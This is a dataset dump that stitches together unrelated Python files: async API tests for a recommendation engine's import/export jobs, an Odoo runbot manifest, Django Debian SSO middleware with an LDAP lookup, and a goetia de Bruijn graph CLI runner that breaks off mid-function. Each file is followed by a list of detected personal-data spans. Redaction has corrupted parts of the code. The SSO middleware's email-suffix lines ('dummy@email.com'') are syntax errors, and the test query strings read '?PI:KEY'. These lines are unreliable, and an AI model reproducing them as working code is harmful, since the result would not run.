resp.json() == {'message': 'Request body is not acceptable'} + + async def test_get_valid(self, init_db, headers, headers_without_content_type, client): + body = [{ + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {""days_interval"": 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1, + 'id': 1, + 'store': { + 'id': 1, + 'name': 'test', + 'country': 'test', + 'configuration': {} + }, + 'item_type': { + 'id': 1, + 'store_items_class': None, + 'stores': [{ + 'configuration': {}, + 'country': 'test', + 'id': 1, + 'name': 'test' + }], + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 'properties': {'sku': {'type': 'string'}} + }, + 'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}] + }, + 'strategy': { + 'id': 1, + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest', + 'object_types': ['top_seller_array'] + } + }] + + client = await client + resp = await client.get( + '/engine_objects/?store_id=1&item_type_id=1&strategy_id=1', + headers=headers_without_content_type + ) + assert resp.status == 200 + assert await resp.json() == body + + +class TestEngineObjectsModelUriTemplatePatch(object): + + async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.patch('/engine_objects/1/', headers=headers, data='') + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is missing'} + + async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.patch('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert (await resp.json()) == { + 'message': '{} does not have enough properties. '\ + ""Failed validating instance for schema['minProperties']"", + 'schema': { + 'type': 'object', + 'additionalProperties': False, + 'minProperties': 1, + 'properties': { + 'name': {'type': 'string'}, + 'configuration': {} + } + } + } + + async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type): + client = await client + body = { + 'configuration': {} + } + resp = await client.patch('/engine_objects/1/', headers=headers, data=ujson.dumps(body)) + assert resp.status == 400 + print(ujson.dumps(await resp.json(), indent=4)) + assert (await resp.json()) == { + 'message': ""'days_interval' is a required property. ""\ + ""Failed validating instance for schema['required']"", + 'schema': { + 'type': 'object', + 'required': ['days_interval'], + 'additionalProperties': False, + 'properties': { + 'days_interval': {'type': 'integer'} + } + } + } + + async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type): + client = await client + body = { + 'name': 'Top Seller Object Test' + } + resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body)) + assert resp.status == 404 + + async def test_patch(self, init_db, client, headers, headers_without_content_type): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body)) + obj = (await resp.json())[0] + + body = { + 'name': 'test2' + } + resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body)) + obj['name'] = 'test2' + + assert resp.status == 200 + assert (await resp.json()) == obj + + +class TestEngineObjectsModelUriTemplateGet(object): + + async def test_get_with_body(self, init_db, headers, client): + client = await client + resp = await client.get('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert await resp.json() == {'message': 'Request body is not acceptable'} + + async def test_get_not_found(self, init_db, headers_without_content_type, client): + client = await client + resp = await client.get('/engine_objects/2/', headers=headers_without_content_type) + assert resp.status == 404 + + async def test_get(self, init_db, headers, headers_without_content_type, client): + client = await client + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + body = { + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {""days_interval"": 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1, + 'id': 1, + 'store': { + 'id': 1, + 'name': 'test', + 'country': 'test', + 'configuration': {} + }, + 'item_type': { + 'id': 1, + 'store_items_class': None, + 'stores': [{ + 'configuration': {}, + 'country': 'test', + 'id': 1, + 'name': 'test' + }], + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 'properties': {'sku': {'type': 'string'}} + }, + 'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}] + }, + 'strategy': { + 'id': 1, + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest', + 'object_types': ['top_seller_array'] + } + } + + assert resp.status == 200 + assert await resp.json() == body + + +class TestEngineObjectsModelUriTemplateDelete(object): + + async def test_delete_with_body(self, init_db, client, headers): + client = await client + + resp = await client.delete('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is not acceptable'} + + async def test_delete_valid(self, init_db, client, headers, headers_without_content_type): + client = await client + + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 200 + + resp = await client.delete('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 204 + + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 404 + + +def datetime_mock(): + mock_ = mock.MagicMock() + mock_.now.return_value = datetime(1900, 1, 1) + return mock_ + + +async def _wait_job_finish(client, headers_without_content_type, job_name='export'): + sleep(0.05) + while True: + resp = await client.get( + '/engine_objects/1/{}?PI:KEY'.format(job_name), + headers=headers_without_content_type) + if (await resp.json())['status'] != 'running': + break + + return resp + + +def set_patches(monkeypatch): + monkeypatch.setattr('swaggerit.models.orm._jobs_meta.random.getrandbits', + mock.MagicMock(return_value=131940827655846590526331314439483569710)) + monkeypatch.setattr('swaggerit.models.orm._jobs_meta.datetime', datetime_mock()) + + +class TestEngineObjectsModelsDataImporter(object): + + async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + resp = await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + assert resp.status == 201 + assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + await _wait_job_finish(client, headers_without_content_type, 'import_data') + + async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + resp = await client.get('/engine_objects/1/import_data?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type, 'import_data') + + + async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type, 'import_data') + + assert await resp.json() == { + 'status': 'done', + 'result': {'lines_count': 3}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', + mock.MagicMock(side_effect=Exception('testing'))) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type, 'import_data') + + assert await resp.json() == { + 'status': 'error', + 'result': {'message': 'testing', 'name': 'Exception'}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + +async def _post_products(client, headers, headers_without_content_type, products=[{'sku': 'test'}]): + resp = await client.post('/item_types/1/items?store_id=1', + data=ujson.dumps(products), headers=headers) + resp = await client.post('/item_types/1/update_filters?store_id=1', + headers=headers_without_content_type) + + sleep(0.05) + while True: + resp = await client.get( + '/item_types/1/update_filters?store_id=1&PI:KEY', + headers=headers_without_content_type) + if (await resp.json())['status'] != 'running': + break + + return resp + + +def set_readers_builders_patch(monkeypatch, values=None): + if values is None: + values = [[ujson.dumps({'value': 1, 'item_key': 'test'}).encode()]] + + readers_builder = values + mock_ = mock.MagicMock() + mock_.return_value = readers_builder + + monkeypatch.setattr( + 'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers', + mock_ + ) + + +class TestEngineObjectsModelsObjectsExporter(object): + + async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + set_readers_builders_patch(monkeypatch) + + client = await client + await _post_products(client, headers, headers_without_content_type) + resp = await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop): + set_patches(monkeypatch) + + prods = [ujson.dumps({'value': i, 'item_key': 'test{}'.format(i)}).encode() for i in range(100)] + set_readers_builders_patch(monkeypatch, [[b'\n'.join(prods)]]) + + client = await client + products = [{'sku': 'test{}'.format(i)} for i in range(10)] + + await _post_products(client, headers, headers_without_content_type, products) + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type) + + assert await resp.json() == { + 'status': 'done', + 'result': {'length': 1, 'max_sells': 1, 'min_sells': 1}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error( + self, init_db, headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch, []) + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': { + 'message': ""No data found for engine object 'Top Seller Object'"", + 'name': 'EngineError' + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + +def CoroMock(): + coro = mock.MagicMock(name=""CoroutineResult"") + corofunc = mock.MagicMock(name=""CoroutineFunction"", side_effect=asyncio.coroutine(coro)) + corofunc.coro = coro + return corofunc + + +def set_data_importer_patch(monkeypatch, mock_=None): + if mock_ is None: + mock_ = mock.MagicMock() + + monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', mock_) + return mock_ + + +class TestEngineObjectsModelsObjectsExporterWithImport(object): + + async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + get_data_patch = set_data_importer_patch(monkeypatch) + get_data_patch.return_value = {} + + resp = await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + hash_ = await resp.json() + + await _wait_job_finish(client, headers_without_content_type) + + called = bool(TopSellerArrayTest.get_data.called) + TopSellerArrayTest.get_data.reset_mock() + + assert hash_ == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + assert called + + async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + def func(x, y, z): + sleep(1) + return {} + + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + set_data_importer_patch(monkeypatch, func) + await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'done', + 'result': { + 'importer': {'lines_count': 3}, + 'exporter': { + 'length': 1, + 'max_sells': 1, + 'min_sells': 1 + } + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error_in_import_with_import( + self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + get_data_patch = set_data_importer_patch(monkeypatch) + get_data_patch.side_effect = Exception('testing') + await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': {'message': 'testing', 'name': 'Exception'}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error_in_export_with_import( + self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch, []) + await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': { + 'message': ""No data found for engine object 'Top Seller Object'"", + 'name': 'EngineError' + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } +",26915,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Diogo Dutra'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'engine_object'], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'test_delete_valid(self'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['NRP', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['URL', 'email.com'], ['URL', 'swaggerit.mo'], ['URL', 'tests.integration.fi'], ['URL', 'pytest.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tests.integration.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tmp.na'], ['URL', 'tmp.cl'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'tests.integration.fi'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'tests.integration.fi'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'mock.Ma'], ['URL', '.now.re'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'meta.random.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'mock.Ma'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'mock.Ma'], ['URL', 'asyncio.co'], ['URL', 'corofunc.co'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'patch.re'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.ca'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.re'], ['URL', 'client.ge'], ['URL', 'client.ge'], ['URL', 'patch.si'], ['URL', 'client.ge'], ['URL', 'client.ge']]" +36,"# -*- encoding: utf-8 -*- +# +# Module Writen to OpenERP, Open Source Management Solution +# +# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/ +# All Rights Reserved. +# info Vauxoo (dummy@email.com) +# +# Coded by: Vauxoo (dummy@email.com) +# +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . +# + +{ + 'name': 'Runbot sync remote info', + 'category': 'Website', + 'summary': 'Runbot', + 'version': '1.0', + 'description': """"""This module create a connection with + remote host of git to sync information. + e.g. Status of pull request + e.g. name source branch of a pull request"""""", + 'author': 'Vauxoo', + 'depends': ['runbot'], + 'external_dependencies': { + }, + 'data': [ + 'data/ir_cron_data.xml', + 'view/runbot_view.xml', + ], + 'installable': True, +} +",1491,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Runbot'], ['PERSON', 'Runbot'], ['PERSON', 'runbot'], ['URL', 'http://www.vauxoo.com/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com']]" +37,"# Copyright 2013 The Distro Tracker Developers +# See the COPYRIGHT file at the top-level directory of this distribution and +# at http://deb.li/DTAuthors +# +# This file is part of Distro Tracker. It is subject to the license terms +# in the LICENSE file found in the top-level directory of this +# distribution and at http://deb.li/DTLicense. No part of Distro Tracker, +# including this file, may be copied, modified, propagated, or distributed +# except according to the terms contained in the LICENSE file. + +from __future__ import unicode_literals +from django.contrib.auth.middleware import RemoteUserMiddleware +from django.contrib.auth.backends import RemoteUserBackend +from django.contrib import auth +from pts.accounts.models import UserEmail +from pts.core.utils import get_or_none +from pts.accounts.models import User + +import ldap + + +class DebianSsoUserMiddleware(RemoteUserMiddleware): + """""" + Middleware that initiates user authentication based on the REMOTE_USER + field provided by Debian's SSO system. + + If the currently logged in user is a DD (as identified by having a @debian.org + address), he is forcefully logged out if the header is no longer found or is + invalid. + """""" + header = 'REMOTE_USER' + + def extract_email(self, username): + parts = [part for part in username.split(':') if part] + federation, jurisdiction = parts[:2] + if (federation, jurisdiction) != ('DEBIANORG', 'DEBIAN'): + return + + return parts[-1] + dummy@email.com' + + def is_debian_user(self, user): + return any( + email.email.endswith(dummy@email.com') + for email in user.emails.all() + ) + + def log_out_user(self, request): + if request.user.is_authenticated(): + if self.is_debian_user(request.user): + auth.logout(request) + + def process_request(self, request): + if self.header not in request.META: + # If a user is logged in to the PTS by Debian SSO, sign him out + self.log_out_user(request) + return + + username = request.META[self.header] + if not username: + self.log_out_user(request) + return + email = self.extract_email(username) + + if request.user.is_authenticated(): + if request.user.emails.filter(email=email).exists(): + # The currently logged in user matches the one given by the + # headers. + return + + user = auth.authenticate(remote_user=email) + if user: + request.user = user + auth.login(request, user) + + +class DebianSsoUserBackend(RemoteUserBackend): + """""" + The authentication backend which authenticates the provided remote user + (identified by his @debian.org email) in the PTS. If a matching User + model instance does not exist, one is automatically created. In that case + the DDs first and last name are pulled from Debian's LDAP. + """""" + def authenticate(self, remote_user): + if not remote_user: + return + + email = remote_user + + email_user = get_or_none(UserEmail, email=email) + if not email_user: + names = self.get_user_details(remote_user) + kwargs = {} + if names: + kwargs.update(names) + user = User.objects.create_user(main_email=email, **kwargs) + else: + user = email_user.user + + return user + + def get_uid(self, remote_user): + # Strips off the @debian.org part of the email leaving the uid + return remote_user[:-11] + + def get_user_details(self, remote_user): + """""" + Gets the details of the given user from the Debian LDAP. + :return: Dict with the keys ``first_name``, ``last_name`` + ``None`` if the LDAP lookup did not return anything. + """""" + l = ldap.initialize('ldap://db.debian.org') + result_set = l.search_s( + 'dc=debian,dc=org', + ldap.SCOPE_SUBTREE, + 'uid={}'.format(self.get_uid(remote_user)), + None) + if not result_set: + return None + + result = result_set[0] + return { + 'first_name': result[1]['cn'][0].decode('utf-8'), + 'last_name': result[1]['sn'][0].decode('utf-8'), + } + + def get_user(self, user_id): + try: + return User.objects.get(pk=user_id) + except User.DoesNotExist: + return None +",4455,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2013'], ['PERSON', 'ldap'], ['PERSON', 'REMOTE_USER'], ['LOCATION', 'remote_user'], ['LOCATION', 'remote_user'], ['PERSON', 'remote_user'], ['PERSON', ""dc=org'""], ['LOCATION', 'ldap'], ['URL', 'http://deb.li/DTAuthors'], ['URL', 'http://deb.li/DTLicense.'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.auth.ba'], ['URL', 'django.co'], ['URL', 'pts.accounts.mo'], ['URL', 'pts.co'], ['URL', 'pts.accounts.mo'], ['URL', 'debian.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'user.emails.al'], ['URL', 'request.user.is'], ['URL', 'self.is'], ['URL', 'request.us'], ['URL', 'request.ME'], ['URL', 'request.ME'], ['URL', 'request.user.is'], ['URL', 'request.user.emails.fi'], ['URL', 'auth.au'], ['URL', 'request.us'], ['URL', 'debian.org'], ['URL', 'self.ge'], ['URL', 'User.objects.cr'], ['URL', 'user.us'], ['URL', 'debian.org'], ['URL', 'ldap.in'], ['URL', 'db.debian.org'], ['URL', 'l.se'], ['URL', 'ldap.SC'], ['URL', 'self.ge'], ['URL', 'User.objects.ge'], ['URL', 'User.Do']]" +38,"#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# (c) Camille Scott, 2019 +# File : cdbg_stream.py +# License: MIT +# Author : Camille Scott dummy@email.com +# Date : 11.03.2020 + +from goetia import libgoetia + +from goetia.cdbg import (compute_connected_component_callback, + compute_unitig_fragmentation_callback, + write_cdbg_metrics_callback, + write_cdbg_callback) +from goetia.dbg import get_graph_args, process_graph_args +from goetia.parsing import get_fastx_args, iter_fastx_inputs +from goetia.processors import AsyncSequenceProcessor, at_modulo_interval +from goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages) +from goetia.metadata import CUR_TIME +from goetia.serialization import cDBGSerialization + +from goetia.cli.args import get_output_interval_args, print_interval_settings +from goetia.cli.runner import CommandRunner + +import curio + +import os +import sys + + +class cDBGRunner(CommandRunner): + + def __init__(self, parser): + get_graph_args(parser) + get_cdbg_args(parser) + get_output_interval_args(parser) + + group = get_fastx_args(parser) + group.add_argument('-o', dest='output_filename', default='/dev/stdout') + group.add_argument('-i', '--inputs', dest='inputs', nargs='+', required=True) + + parser.add_argument('--echo', default=None, + help='echo all events to the given file.') + parser.add_argument('--curio-monitor', default=False, action='store_true', + help='Run curio kernel monitor for async debugging.') + parser.add_argument('--verbose', default=False, action='store_true') + + super().__init__(parser) + + def postprocess_args(self, args): + process_graph_args(args) + process_cdbg_args(args) + + def setup(self, args): + os.makedirs(args.results_dir, exist_ok=True) + + self.dbg_t = args.graph_t + self.hasher = args.hasher_t(args.ksize) + self.storage = args.storage.build(*args.storage_args) + self.dbg = args.graph_t.build(self.storage, self.hasher) + + self.cdbg_t = libgoetia.cdbg.cDBG[type(self.dbg)] + + self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)] + + self.compactor = self.compactor_t.Compactor.build(self.dbg) + + if args.normalize: + self.file_processor = self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor, + args.normalize, + args.interval) + else: + self.file_processor = self.compactor_t.Processor.build(self.compactor, + args.interval) + + # Iterator over samples (pairs or singles, depending on pairing-mode) + sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names) + # AsyncSequenceProcessor does event management and callback for the FileProcessors + self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo) + # Subscribe a listener to the FileProcessor producer + self.worker_listener = self.processor.add_listener('worker_q', 'cdbg.consumer') + + # + # Register callbacks for data outputs. + # Track a list of files that need to be closed with a ] + # when we're done. + # + self.to_close = [] + + if args.track_cdbg_metrics: + self.worker_listener.on_message(Interval, + write_cdbg_metrics_callback, + self.compactor, + args.track_cdbg_metrics, + args.verbose) + self.to_close.append(args.track_cdbg_metrics) + + + if args.track_unitig_bp: + if args.unitig_bp_bins is None: + bins = [args.ksize, 100, 200, 500, 1000] + else: + bins = args.unitig_bp_bins + + self.worker_listener.on_message(Interval, + at_modulo_interval(compute_unitig_fragmentation_callback, + modulus=args.unitig_bp_tick), + self.cdbg_t, + self.compactor.cdbg, + args.track_unitig_bp, + bins, + verbose=args.verbose) + self.to_close.append(args.track_unitig_bp) + + + if args.track_cdbg_components: + self.worker_listener.on_message(Interval, + at_modulo_interval(compute_connected_component_callback, + modulus=args.cdbg_components_tick), + self.cdbg_t, + self.compactor.cdbg, + args.track_cdbg_components, + args.component_sample_size, + verbose=args.verbose) + self.to_close.append(args.track_cdbg_components) + + if args.save_cdbg: + for cdbg_format in args.save_cdbg_format: + self.worker_listener.on_message(Interval, + at_modulo_interval(write_cdbg_callback, + modulus=args.cdbg_tick), + args.save_cdbg, + cdbg_format, + verbose=args.verbose) + self.worker_listener.on_message(SampleFinished, + write_cdbg_callback, + args.save_cdbg, + cdbg_format, + verbose=args.verbose) + + # Close all files when done + async def close_files(msg, files): + for file_name in files: + async with curio.aopen(file_name, 'a') as fp: + await fp.write('\n]\n') + + self.worker_listener.on_message(SampleFinished, close_files, self.to_close) + + # + # Regular diagnostics output + # + + def info_output(msg): + info = f'{msg.msg_type}: {getattr(msg, ""state"", """")}'\ + f'\n\tSample: {msg.sample_name}'\ + f'\n\tSequences: {msg.sequence}'\ + f'\n\tk-mers: {msg.t}' + if msg.msg_type == 'Error': + info += f'\n\tError: {msg.error}' + + print(info, file=sys.stderr) + + self.worker_listener.on_message(AllMessages, info_output) + + def execute(self, args): + curio.run(self.processor.start, with_monitor=args.curio_monitor) + + def teardown(self): + pass + + +def get_cdbg_args(parser): + default_prefix = 'goetia.build-cdbg.' + CUR_TIME + parser.default_prefix = default_prefix + group = parser.add_argument_group('cDBG') + + group.add_argument('--results-dir', + default=default_prefix) + + group.add_argument('--normalize', + type=int, + nargs='?', + const=10) + + group.add_argument('--save-cdbg', + metavar='PREFIX.', + nargs='?', + const='goetia.cdbg.graph', + help='Save a copy of the cDBG.') + group.add_argument('--save-cdbg-format', + nargs='+', + choices=cDBGSerialization.FORMATS, + default=['gfa1']) + group.add_argument('--cdbg-tick', + type=int, + default=10, + help='Save every N interval ticks.') + + group.add_argument('--track-cdbg-metrics', + metavar='FILE_NAME.json', + nargs='?', + const='goetia.cdbg.stats.json', + help='Output basic cDBG metrics.') + group.add_argument('--cdbg-metrics-tick', + type=int, + default=5, + help='Output every N interval ticks.') + + group.add_argument('--track-cdbg-components', + metavar='FILE_NAME.json', + nargs='?', + const='goetia.cdbg.components.json', + help='Save the distribution of component sizes.') + group.add_argument('--component-sample-size', + type=int, + default=10000, + help='Number of components to sample for size.') + group.add_argument('--cdbg-components-tick', + type=int, + default=5, + help='Sample and save distribution every N interval ticks.') + + group.add_argument('--track-unitig-bp', + metavar='FILENAME.json', + nargs='?', + const='goetia.cdbg.unitigs.bp.json', + help='Track the distribution of unitig sizes.') + group.add_argument('--unitig-bp-bins', + nargs='+', + type=int, + help='Bin sizes of distribution.') + group.add_argument('--unitig-bp-tick', + type=int, + default=10) + + group.add_argument('--validate', + metavar='FILENAME.csv', + nargs='?', + const='goetia.cdbg.validation.csv') + + return group + + +def process_cdbg_args(args): + + def join(p): + return p if p is None else os.path.join(args.results_dir, p) + + args.track_cdbg_stats = join(args.track_cdbg_metrics) + args.track_cdbg_components = join(args.track_cdbg_components) + args.save_cdbg = join(args.save_cdbg) + args.track_cdbg_unitig_bp = join(args.track_unitig_bp) + + +def print_cdbg_args(args): + print('* cDBG Params', file=sys.stderr) + print('* Directory: ', 